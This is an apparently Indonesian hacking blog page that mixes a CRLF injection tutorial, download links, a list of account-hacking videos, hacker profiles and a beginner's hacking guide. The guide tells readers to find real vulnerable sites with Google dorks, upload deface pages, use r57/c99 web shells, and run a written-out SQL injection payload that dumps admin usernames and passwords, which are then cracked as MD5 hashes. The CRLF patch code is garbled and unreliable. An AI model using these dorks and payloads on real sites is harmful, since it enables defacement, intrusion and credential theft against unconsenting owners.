Blog Archive
Labels
- Anime Movie (15)
- Aplikasi dan Games Handphone (3)
- Book and Story (3)
- Hacking (9)
- Linux (10)
- News and tecnology (2)
- News Movie (14)
- PC Games and Software (21)
- Programming (3)
- Tips n Trik (3)
shoutbox
Tutorial CRLF
atau biasa juga di sebut sebagai HTTP response splitting
yaitu serangan web yang memanipulasi sanatization php code yg memang sengaja
di injeksi ama user.
biasanya si attacker memanfaatkan kelemahan aplikasi web untuk melakukan
berbagai macam serangan kek XSS,cross user defacement,bahkan positionin cache web klien.
MEKANISME CRLF INJECTION
CRLF (CARRIAGE RETURN and LINE FEED) menggunakan kedua karakter khusus yang mewakili
End Of Line (EOL) sebagai penanda untuk protokol internet,tapi kagak terbatas
pada MIME (e-mail,NNTP (newsgroup) dan yang lebih penting HTTP.
CONTOH SERANGAN :
misalkan kita mengelola site yang ada bug CRLF si attacker ini bakal ngirim email
ke salah satu site admin kita yang berisi link CRLF-crafted,link ini seh
http://www.surabayahackerlink.org/news.php?page =% 0D% 0aContent-Type: text / html% 0D% 0aHTTP/1.1 200% OK 0D% 0aContent-Type: text / html% 0D% 0A% 0D % 0a% 3EHACKED 3CSOMEONE%% 3E% content 3C/html
tampaknya baek-baek ajah,tapi pas kita klik dan ke--redirect
ke site kita link nya
bakal nampil kek gini :
[code]http://surabayahackerlink:2082/frontend/x3/index.html?post_login =% 0D% 0aContent-Type: text / html% 0D% 0aHTTP/1.1 200% OK 0D% 0aContent-Type: text / html% 0D% 0A% 0D % 0a% 3EHACKED 3CSOMEONE%% 3E% content 3C/htmlHACKED SOMEONE
serangan ini seh cuma munculin kata-kata pada mesin korbang
tapi bahaynya adalah bahwa server kita menghasilkan kode HTML,sehingga
si attacker bakal lebih gampan inject html code ke browser web kita
akibatnya serangan ini bisa menyebabkan poisoning of cache pada web client,cookie,XSS
entah perusakan permanen ato sementara pada halaman web kita [ hoyoh,lagi-lagi kita
bahkan pencurian informasi pada database!!!
balik ke link tsb,misal kita melihat yang ini :
http://www.surabayahackerlink.org/news.php?page =% 0D% 0aContent-Type: text / html% 0D% 0aHTTP/1.1 200% OK 0D% 0aContent-Type: text / html% 0D% 0A% 0D % 0a% 3EHACKED 3CSOMEONE%% 3E% content 3C/htmlmungkin beberapa pars code
Quote:"event 0a% pattern% oD"pattern ini adalah setara dengan pengiriman request http crlf dan merupakan
alasan mengapa kita sebut teknik ini sebuah CRLF injection [ tuh,kan
PENCEGAHAN :
sebenrnya seh,cara pencegahannya tuh gampang-gampang susah,gk beda kl kita ngupil pake jari
telunjuk kaki kiri
berisi kode server return line.pentest wat cari bug ini sangat susah (menurut ane)
karena aplikasi web yang paling banyak digunakan saat ini adalah
sisi-server redirect.sehingga lokasi kerentanan ini tidak selalu jelas.
[*tapi jangan salah buktinya forum ane yg ane pentest juga kena bug ini :( ]
serangan dan vulnerabilitas laennya,bisa digunakan memeriksa kekuatan password
pada halaman otentikasi dan secara otomatis audit shopping cart,form,dynamic content dan
applikasi web laennya.
PATCH :
walopun serem,tapi patchnya kagak sesulit ngupil
pake jari telunjuk kaki kiri,VULNERABILITAS CRLF sangat mudah untuk patch.
Contoh kode berikut mengasumsikan input yang setting ke
$['input']_POST
if (eregi('n',['input']$_POST)); // ini memeriksa untuk karakter baris baru pada variabel POST
{// Start if ..
die ("CRLF Attack Terdeteksi"); // program keluar jika CRLF ditemukan dalam variabel
} // End if ..ane dapetin bug ini karena pake w3af.
credit schumbag devilzc0de
Hacker’s Black Book
Hacker’s Black Book

Product Details
- Paperback: 139 pages
- Publisher: Ingo Haese publishing (April 2003)
- ISBN-10: 3935494025
- ISBN-13: 978-3935494021
After reading through the hackers blackbook i was able to plug a few holes and heighten our security even more. — John Tenjack (Kansas), reader, May 31, 2002
The book gives a very good overview of what kind of attacks users are subject when connected to the net. — Hugo Rodrigues (UK), reader, June 8, 2002
WITH THE BOOK I WAS ABLE TO “HACK” MY OWN SYSTEMS AND I LEARNED HOW TO PROTECT THEM. — ALBANO (New York), reader, June 4, 2002
Product Description
This unique report gives a perfect overview, what hackers are able to, how they act and how to protect a system. It’s easy to read (not heavy to read like all other books around hacking) and fascinating.More than 200,000 peoples in all over the world (USA and Germany) already read this report. Now they act more carefully in the internet. PLUS: The book contains a login and password to an online readers area with tools, articles and a special hacking and security search engine.
download: http://rapidshare.com/files/50308182/Hackers.Black.Book.pdf
Hacker
Apa Itu Hacker ??
Segelintir orang mungkih masih beranggapan bahwa hacker adalah orang yg suka merusak,merugikan,pembawa sial,gak punya aturan,dan hal² negatif lainnya.Tapi tahu kah anda arti Hacker yg sesungguh nya? apa saja hal yg di kerjakannya ? dari mana dia berasal ? dan apa saja inti dari pekerjaanya.Saya hanya ingin menjelaskan sedikit pengertian hacker dan aturan main yg saya ketahui dari berbagai nara sumber,termasuk dari teman² saya di forum.
Hacker julukan untuk orang yang penasaran bila dikatakan tidak ada celah diprogram kami, karena hacker tidak pernah percaya ada program yang sempurna.
- dapat melihat yang tidak bisa dilihat oleh admin,
- mengingatkan admin, bila terjadi celah pada system nya
- bukan lah pencuri (carder), perusak, atau penghancur.
- mempunyai kode etik
- berkembang seiring berkembangnya teknologi
- tidak ingin merasa hebat,
- tak pernah mudah menyerah untuk mencoba, karena pekerjaan kami jauh melampaui manusia biasa
- mencari informasi.
- sama dengan user, kami bayar bila main diwarnet, kami bermain internet (browsing, chatting, dll) Very Happy
- menjunjung solidaritas tinggi ilmu pengetahuan
- senang bermain-main dengan program
- hitam sebab kami senang mempunyai ciri khas hitam,
- underground kami dianggap kaum bawah, karena kami tidak ingin dianggap hebat
- negatif kami senang melewati pintu belakang(backdoor)
- perusak kami bukan perusak, kami hanya memberitahukan admin
- musuh peradapan teknologi: karena kami maka ada perkembangan teknologi, tidak ada noda ya tidak belajar
- musuh kami bukan musuh yang harus dibasmi, karena kami orang hebat, dunia maya kami the winner, system kami yang the champion ,, kami sama dengan kalian, kami punya aturan, kami punya etika, kami punya hatinurani, dimana kesalah kami?
sumber: www.forum.hackers-center.com
kumpulan Video Hacking
- vidio hacking friendster 1 ----> klik disini
- vidio hacking friendster 2 new -----> Klik disini for download
- friendster_hacking
- friendster_hacking_2
- friendster_hacking_3
- Bugs CSRF di Friendster<--- tinggal klik 2x file nya
- cara buka foto fs yang di kunci
- cara menghilangkan iklan google di profile friendster
- HACK FRIENDSTER DENGAN FAKE LOGIN
Video newhack[dot]org ada 2 Video klik di bawaH
moHon liHat nama filenya untuk menonton confert dulu kalo tidak suport
- Video ngeroot - Allnone file swf -- bindroot.rar
- Video Root Kits file swf ---gmail.rar
- YahooHacking -------- rootcobe.rar
- Video SQL Injection ----- rootpart2.rar
- Video Cara jadi admin di PHP Nuke - bindroot.rar
- MassDeface -------- takecpanel.rar
- HackPHPinjection --- proxybuat.rar.html
- HackEmail ---- proxysock2.rar
- HackPHPNuke 2
- HackPhpGedView
- HackPhpCoin
- vBulletin Hack
- Video shoping
- mailbomb
- readmin
- tunelirc
- patchphp-ini
- patchbug
- nginject
- awas_movie_palsu
- cek_bug_dgn_nikto
- compile_assembler
- cpp_builder
- fingerprinting
- install_phpbb
- nembak_apache
- tes_program
- video_xcode
- HackAdvancedGuestbook
- HackBukuTamu
- HackCatalog
- HackCpath
- HackForumPhpBB2
- HackHpMaker
- HackMambo
- Video WMF File Code Execution Vulnerability
- Video War Driving Tools
- Video Vulnerability file upload
- Video Root Kits
- Video Remote Password auditing THC-Hydra
- Video Recovering Deleted Files
- Video NetworkActiv
- Video NC - How to bind port in linux - part 2
- Video Metasploit Framework
- Video Make your own VMs with hard drive for free VMware Player and VMX Builder
- Video MacChanger by Adi
- Video Mac Bridging with Windows XP & Sniffing
- Video Linux Rooting
- Video Install Ubuntu by Adi
- Video Hacking Windows XP SP2 by Adi [First Version]
- Video Hacking password GMAIL dengan Bruteforce
- Video Hack Windows XP SP2 by Adi [New Version]
- Video Get Connect Back via NC in linux
- Video Filtering di e-mail Yahoo by Adi
- Video Elinks by Adi
- Video Cracking Windows Password with BackTrack
- Video Cracking Syskey and the SAM on Windows
- Video Brutus
- Video Cracking Syskey and the SAM on Windows
Komputer FBI & Kepolisan AS Diserang Virus Misterius
WASHINGTON - FBI dan Kepolisaan AS langsung mematikan jaringan komputer mereka, sebagai upaya pencegahan terhadap serangan peretas. Pasalnya, sistem mereka di unit pelayanan hukum telah disusupi virus misterius.
Pihak kepolisian Amerika itu mengatakan, mereka telah memutuskan jaringan komputer di layanan hukum, sebagai upaya untuk menangkal virus komputer yang belum teridentifikasi itu menjalar ke tempat mereka. Demikian juga dengan FBI, yang melakukan hal yang serupa.
"Kami telah mengevaluasi sistem jaringan eksternal. Pencegahan dini perlu segera dilakukan," kata juru bicara FBI Mike Kortan, seperti yang dikutip Yahoo News, Jumat (22/5/2009).
"Kami memutuskan jaringan kami sementara waktu dan jaringan Departemen Kehakiman juga melakukan hal yang sama untuk mencegah meluasnya dampak virus tersebut," tambah juru bicara kepolisaan AS.
Mike Kortan juga mengatakan, kalau sebelumnya komputer di FBI sedang mengalami masalah. Namun sayang, tidak disebutkan masalah apa yang dimaksud itu berupa virus yang dimaksud. FBI sendiri ketar-ketir, mengingat sebuah sumber menyebutkan, kalau peretas China sedang berusaha membobol data penting mereka. (srn)
okezone.com
Most 5 black hacker
NASA pun sempat menjadi target keisengan James, James mencuri software NASA yang diperkirakan seharga $1,7 Juta Dollar AS, sampai - sampai NASA dipaksa untuk mematikan server dan sistemnya. Karena kelakuannya itu James tidak boleh memegang komputer selama 10 tahun. Akan tetapi sekarang James sudah berada di jalan yang benar dan membuat sebuah perusahaan keamanan di bidang komputer
2. ADRIAN LAMO
Adrian Lamo membobol New York Times untuk mendapatkan info personal dan beberapa security number dan membobol Microsoft. Akhirnya Adrian Lamo didenda $65.000 dollar US. Akan tetapi saat ini Adrian Lamo sudah berjalan di jalan yang semestinya. Adrian Lamo saat ini menjadi pembicara di beberapa acara seminar.
Ini adalah beberapa sepak terjang Kevin Mitnick
- Menggunakan Los Angeles Bus Transfer System untuk mendapatkan tumpangan gratis.
- Mengelabui FBI
- Hacking ke dalam DEC System ( Digital Equipment Corporation )
- Mendapatkan Administrator position dalam satu komputer IBM agar menang judi.
- Hacking Motorola, Nec, Nokia, Sun Microsystems dan Fujitsu Siemens Systems
- Dan masih banyak lagi . . .
Seorang white hat hacker bernama Tsutomu Shimomura ( Tsutomu merupakan top 5 white hat hacker ) di hack komputer systemnya, dan terjadilah perang luar biasa. Kevin Mitnick terlacak dan tertangkap oleh FBI dengan bantuan Tsutomu Shimomura yang melacak ( tracking ) lewat jaringan HP yang dibawa oleh Mitnick saat itu. Akan tetapi Mitnick sekarang sudah menjadi penulis buku, konsultan security dan pembicara berbagai seminar.
4. KEVIN POULSEN
Juga dikenal dengan Dark Dante, Dark Dante mengehack database FBI. Selain itu Dante juga mengehack seluruh lines phone station. Karena memang kemahiran dia adalah mengehack lewat phone lines. Saat ini Dark Dante menjadi senior di Wired News dan berhasil menangkap 744 penawaran sex melalui profile MySpace.
5. ROBERT TAPPAN MORIS
Robert Tappan Moris adalah orang yang pertama kali membuat Worm, yang dinamai Morris Worm. Melalui Internet dia menyebar wormnya yang mengakibatkan sekitar 6000 komputer menjadi down. Akhirnya Robert dipenjarakan rumah selama 3 tahun dan didenda $10.500 dollars. Sekarang Robert bekerja sebagai professor di sebuah MIT Computer Science and Artificial Intelligence Laboratory.
sumber: supralova.comli.com

Tutor Hacking Buat Pemula

Ok, di posting saya kali ini, saya akan mengulas bagaimana cara untuk hacking website dan mendefacex untuk para pemula, jadi kita cukup menggunakan dork aja,,
pertama2 buka milw0rm,
Contoh target adalaha ourspace 2.0
pertama cuba buka milw0rm trus klik search, lalu ketik RFI, FILE atau SQL. Disini kita ambil bug
http://www.milw0rm.com/exploits/4343.
1. Buka google, trus ketik allinurl:"/cgi-bin/ourspace/ pada search enginenya.
2. Setelah itu cari situs yang mau di cuba
misalnya neh :
3. Hapus /cgi-bin/ourspace//login.cgi ganti dengan
4. Setelah itu muncul upload files
5. Lu bikin html yang bagus terus upload dah...
Hacking RFI (Remote File Inclusion)
---------------------------------
1. Buka google lalu ketik "Php Blue Dragon"
2. Setelah itu cari situs yang mau dicoba
Contohnya : http://www.komix91.ovh.org. Bugnya cari aja di http://www.milw0rm.com
trus ketik PHP BLUE DRAGON. Hasil dari serach pada milw0rm.
- Code:
- http://milw0rm.com/exploits/1779
- http://milw0rm.com/exploits/1913
- http://milw0rm.com/exploits/4276
selanjutnya kalian coba aja sendiri ya. Jangan lupa gunakan shell (r57, c99, dll)
3. Selamat mencoba !
SQL Injection
--------------
Seperti biasa kita membuka site milw0rm untuk melihat bug SQL
contoh BUG SQL http://www.milw0rm.com/exploits/5177
1. Buka google trus ketik allinurl:"com_simpleshop" atau allinurl: "com_simpleshop"section disamping kiri ini berupa dork untuk mencari bug sql pada web.
2. kalau kita telah mendapatnya sekarang kita injeck. Contoh :
- Code:
http://www.target.com/index.php?option=com_simpleshop&Itemid=S@BUN&cmd=section§ion=-000/**/union+select/**/000,111,222,concat(username,0x3a,password),0,concat(username,0x3a,password)/**/from/**/jos_users/*
3. Kalau ada hasilnya, silakan deskripsi password adminnya menggunakan tools MD5 crack, bisa menggunakan ini http://thesoftwareengineer.org/services/md5.php
4. Selamat Mencuba
NB: Segala tindakan yang anda lakukan bukanlah tanggung jawab kami, this is just for education..
Uplink: Hacker Elite

Game ini untuk melatih para hacker. Saya sendiri juga memakainya. selamat mencoba..
Size : 28.62MB
Download
